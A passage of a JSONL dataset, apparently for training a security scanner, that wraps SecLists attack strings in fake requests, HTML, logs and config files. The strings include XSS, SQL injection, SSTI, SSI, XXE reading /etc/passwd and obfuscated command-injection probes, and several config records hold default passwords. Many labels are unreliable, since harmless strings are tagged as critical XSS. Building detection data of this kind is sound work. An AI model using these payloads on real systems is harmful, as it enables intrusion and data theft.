"source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated, internet explorer\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_02063", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#printenv -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#printenv -->", "injection_type": "SSI"}}]} {"id": "seclists_02064", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=$field.in(\"org.apache.velocity.runtime.VelocityEngineVersion\") HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "$field.in(\"org.apache.velocity.runtime.VelocityEngineVersion\")", "injection_type": "SSTI"}}]} {"id": "seclists_02065", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"remote_host\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"remote_host\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02066", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello ${42*42}</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "${42*42}", "injection_type": "SSTI"}}]} {"id": "seclists_02067", "source": "seclists", "source_license": "MIT", "text": "username=or 1=1 or \"\"=&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1 or \"\"=", "injection_type": "SQL"}}]} {"id": "seclists_02068", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:IntelliTouch,administrator,1234,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IntelliTouch,administrator,1234,"}}]} {"id": "seclists_02069", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_02070", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='%26echo$IFSQJCJTG$((15%2B71))$(echo$IFSQJCJTG)QJCJTG%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%26echo$IFSQJCJTG$((15%2B71))$(echo$IFSQJCJTG)QJCJTG%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02071", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: echo$IFSCMWXRB$((87%2B22))$(echo$IFSCMWXRB)CMWXRB//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo$IFSCMWXRB$((87%2B22))$(echo$IFSCMWXRB)CMWXRB//", "injection_type": "cmd"}}]} {"id": "seclists_02072", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: 'echo%20DYFBHG$((50%2B7))$(echo%20DYFBHG)DYFBHG\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'echo%20DYFBHG$((50%2B7))$(echo%20DYFBHG)DYFBHG\"", "injection_type": "cmd"}}]} {"id": "seclists_02073", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=electra\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "electra"}}]} {"id": "seclists_02074", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><svg><header onload=alert(1)></header></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><header onload=alert(1)></header>", "injection_type": "XSS"}}]} {"id": "seclists_02075", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><element onmousedown=\"alert(1)\">test</element></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<element onmousedown=\"alert(1)\">test</element>", "injection_type": "XSS"}}]} {"id": "seclists_02076", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ')) or (('x'))=(('x", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "')) or (('x'))=(('x", "injection_type": "SQL"}}]} {"id": "seclists_02077", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>*/</script>'>alert(1)/*<script/1='</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*/</script>'>alert(1)/*<script/1='", "injection_type": "XSS"}}]} {"id": "seclists_02078", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02079", "source": "seclists", "source_license": "MIT", "text": "filename=&#X3C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X3C", "injection_type": "cmd"}}]} {"id": "seclists_02080", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;echo$IFSKUMZWI$((52%2B68))$(echo$IFSKUMZWI)KUMZWI%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo$IFSKUMZWI$((52%2B68))$(echo$IFSKUMZWI)KUMZWI%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02081", "source": "seclists", "source_license": "MIT", "text": "filename=${exec(print(`echo%20QRLVMM\\necho%20$((41%2B19))\\necho%20QRLVMM\\necho%20QRLVMM`)%3B%2525255C%2525255CQRLVMM", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${exec(print(`echo%20QRLVMM\\necho%20$((41%2B19))\\necho%20QRLVMM\\necho%20QRLVMM`)%3B%2525255C%2525255CQRLVMM", "injection_type": "cmd"}}]} {"id": "seclists_02082", "source": "seclists", "source_license": "MIT", "text": "password: SuSE GmbH,root,root,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "SuSE GmbH,root,root,"}}]} {"id": "seclists_02083", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:php=\"http://php.net/xsl\"><xsl:template match=\"/\"><xsl:copy-of select=\"document('/etc/passwd')\"/></xsl:template></xsl:stylesheet>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:php=\"http://php.net/xsl\"><xsl:template match=\"/\"><xsl:copy-of select=\"document('/etc/passwd')\"/></xsl:template></xsl:stylesheet>", "injection_type": "XXE"}}]} {"id": "seclists_02084", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <IMG SRC=`javascript:alert(\"RSnake says### 'XSS'\")`> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG SRC=`javascript:alert(\"RSnake says### 'XSS'\")`>", "injection_type": "XSS"}}]} {"id": "seclists_02085", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>.source a[a] (name)</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ".source a[a] (name)", "injection_type": "XSS"}}]} {"id": "seclists_02086", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: JavaScript concatenation vector variant 1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: JavaScript concatenation vector variant 1", "injection_type": "XSS"}}]} {"id": "seclists_02087", "source": "seclists", "source_license": "MIT", "text": "filename=\\0\\0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\0\\0", "injection_type": "cmd"}}]} {"id": "seclists_02088", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f", "injection_type": "cmd"}}]} {"id": "seclists_02089", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><ins draggable=\"true\" ondragenter=\"alert(1)\">test</ins></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ins draggable=\"true\" ondragenter=\"alert(1)\">test</ins>", "injection_type": "XSS"}}]} {"id": "seclists_02090", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=! HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "!", "injection_type": "SQL"}}]} {"id": "seclists_02091", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<iframe oncut=\"alert(1)\" contenteditable>test</iframe>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<iframe oncut=\"alert(1)\" contenteditable>test</iframe>", "injection_type": "XSS"}}]} {"id": "seclists_02092", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=echo$IFSHWDYSD$((37%2B57))$(echo$IFSHWDYSD)HWDYSD' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo$IFSHWDYSD$((37%2B57))$(echo$IFSHWDYSD)HWDYSD'", "injection_type": "cmd"}}]} {"id": "seclists_02093", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Non-Alpha/Non-Digit Part 2</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Non-Alpha/Non-Digit Part 2", "injection_type": "XSS"}}]} {"id": "seclists_02094", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20TGJACN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02095", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<p onbeforepaste=\"alert(1)\" contenteditable>test</p>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<p onbeforepaste=\"alert(1)\" contenteditable>test</p>", "injection_type": "XSS"}}]} {"id": "seclists_02096", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'x' or 1=1 or 'x'='y';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' or 1=1 or 'x'='y", "injection_type": "SQL"}}]} {"id": "seclists_02097", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &&echo$IFSIIUTLW$((40%2B43))$(echo$IFSIIUTLW)IIUTLW%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&&echo$IFSIIUTLW$((40%2B43))$(echo$IFSIIUTLW)IIUTLW%7C", "injection_type": "cmd"}}]} {"id": "seclists_02098", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"%7Cecho%20JZTYDR$((14%2B40))$(echo%20JZTYDR)JZTYDR' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%7Cecho%20JZTYDR$((14%2B40))$(echo%20JZTYDR)JZTYDR'", "injection_type": "cmd"}}]} {"id": "seclists_02099", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <!-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <!--", "injection_type": "XSS"}}]} {"id": "seclists_02100", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=echo$IFSCWQJJR$((12%2B68))$(echo$IFSCWQJJR)CWQJJR\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo$IFSCWQJJR$((12%2B68))$(echo$IFSCWQJJR)CWQJJR\"", "injection_type": "cmd"}}]} {"id": "seclists_02101", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf 268435455", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "268435455", "injection_type": "cmd"}}]} {"id": "seclists_02102", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<textarea onclick=\"alert(1)\">test</textarea> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<textarea onclick=\"alert(1)\">test</textarea>", "injection_type": "XSS"}}]} {"id": "seclists_02103", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02104", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf or 0=0 --", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 0=0 --", "injection_type": "cmd"}}]} {"id": "seclists_02105", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"http://example.com/text.txt\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"http://example.com/text.txt\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_02106", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '1) or pg_sleep(__TIME__)--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1) or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_02107", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><time onbeforepaste=\"alert(1)\" contenteditable>test</time></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<time onbeforepaste=\"alert(1)\" contenteditable>test</time>", "injection_type": "XSS"}}]} {"id": "seclists_02108", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = <username>' OR 1=1--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<username>' OR 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_02109", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, basic, internet explorer HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, basic, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_02110", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"query_string_unescaped\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"query_string_unescaped\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02111", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%60 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%60", "injection_type": "cmd"}}]} {"id": "seclists_02112", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=APC,device,device,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "APC,device,device,"}}]} {"id": "seclists_02113", "source": "seclists", "source_license": "MIT", "text": "username=admin\"/*&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\"/*", "injection_type": "SQL"}}]} {"id": "seclists_02114", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:pump@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pump"}}]} {"id": "seclists_02115", "source": "seclists", "source_license": "MIT", "text": "password: Oracle,ADMINISTRATOR,ADMINISTRATOR,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,ADMINISTRATOR,ADMINISTRATOR,"}}]} {"id": "seclists_02116", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=) union select * from information_schema.tables; HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ") union select * from information_schema.tables;", "injection_type": "SQL"}}]} {"id": "seclists_02117", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></noscript> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></noscript>", "injection_type": "XSS"}}]} {"id": "seclists_02118", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>DIV expression</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "DIV expression", "injection_type": "XSS"}}]} {"id": "seclists_02119", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: a);id|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a);id|", "injection_type": "cmd"}}]} {"id": "seclists_02120", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>c=1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "c=1", "injection_type": "XSS"}}]} {"id": "seclists_02121", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><footer onkeyup=\"alert(1)\" contenteditable>test</footer></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<footer onkeyup=\"alert(1)\" contenteditable>test</footer>", "injection_type": "XSS"}}]} {"id": "seclists_02122", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:F5 FirePass Administrative Console,admin,admin,https://support.f5.com/csp/article/K13148@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "F5 FirePass Administrative Console,admin,admin,https://support.f5.com/csp/article/K13148"}}]} {"id": "seclists_02123", "source": "seclists", "source_license": "MIT", "text": "username='&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'", "injection_type": "SQL"}}]} {"id": "seclists_02124", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;echo$IFSUTEXYG$((37%2B68))$(echo$IFSUTEXYG)UTEXYG%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo$IFSUTEXYG$((37%2B68))$(echo$IFSUTEXYG)UTEXYG%26", "injection_type": "cmd"}}]} {"id": "seclists_02125", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=1111\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "1111"}}]} {"id": "seclists_02126", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Local .htc file</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Local .htc file", "injection_type": "XSS"}}]} {"id": "seclists_02127", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=giant\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "giant"}}]} {"id": "seclists_02128", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, self contained</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, self contained", "injection_type": "XSS"}}]} {"id": "seclists_02129", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <IMG SRC=\"javascript:alert('XSS')\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\"javascript:alert('XSS')\"", "injection_type": "cmd"}}]} {"id": "seclists_02130", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' or 'x'='x", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 'x'='x", "injection_type": "SQL"}}]} {"id": "seclists_02131", "source": "seclists", "source_license": "MIT", "text": "filename=a);/usr/bin/id;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a);/usr/bin/id;", "injection_type": "cmd"}}]} {"id": "seclists_02132", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Basic JS breaker variant 2</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Basic JS breaker variant 2", "injection_type": "XSS"}}]} {"id": "seclists_02133", "source": "seclists", "source_license": "MIT", "text": "filename=%3Becho%20BKDTSI$((78%2B91))$(echo%20BKDTSI)BKDTSI%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho%20BKDTSI$((78%2B91))$(echo%20BKDTSI)BKDTSI%26", "injection_type": "cmd"}}]} {"id": "seclists_02134", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Microsoft,MSHOME,MSHOME,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Microsoft,MSHOME,MSHOME,"}}]} {"id": "seclists_02135", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=OpenConnect,adminview,OCS,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "OpenConnect,adminview,OCS,"}}]} {"id": "seclists_02136", "source": "seclists", "source_license": "MIT", "text": "filename='--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'--", "injection_type": "cmd"}}]} {"id": "seclists_02137", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, obfuscated\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_02138", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:robbie", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "robbie"}}]} {"id": "seclists_02139", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%01%02%03%04%0a%0d%0aADSF HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%01%02%03%04%0a%0d%0aADSF", "injection_type": "cmd"}}]} {"id": "seclists_02140", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: http://aa'><script>alert(123)</script>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: http://aa'><script>alert(123)</script>", "injection_type": "XSS"}}]} {"id": "seclists_02141", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><pre onkeypress=\"alert(1)\" contenteditable>test</pre></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<pre onkeypress=\"alert(1)\" contenteditable>test</pre>", "injection_type": "XSS"}}]} {"id": "seclists_02142", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=*/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*/*", "injection_type": "SQL"}}]} {"id": "seclists_02143", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: OWASP</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: OWASP", "injection_type": "XSS"}}]} {"id": "seclists_02144", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<li oncontextmenu=\"alert(1)\">test</li> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<li oncontextmenu=\"alert(1)\">test</li>", "injection_type": "XSS"}}]} {"id": "seclists_02145", "source": "seclists", "source_license": "MIT", "text": "filename=%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AIVPGH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": 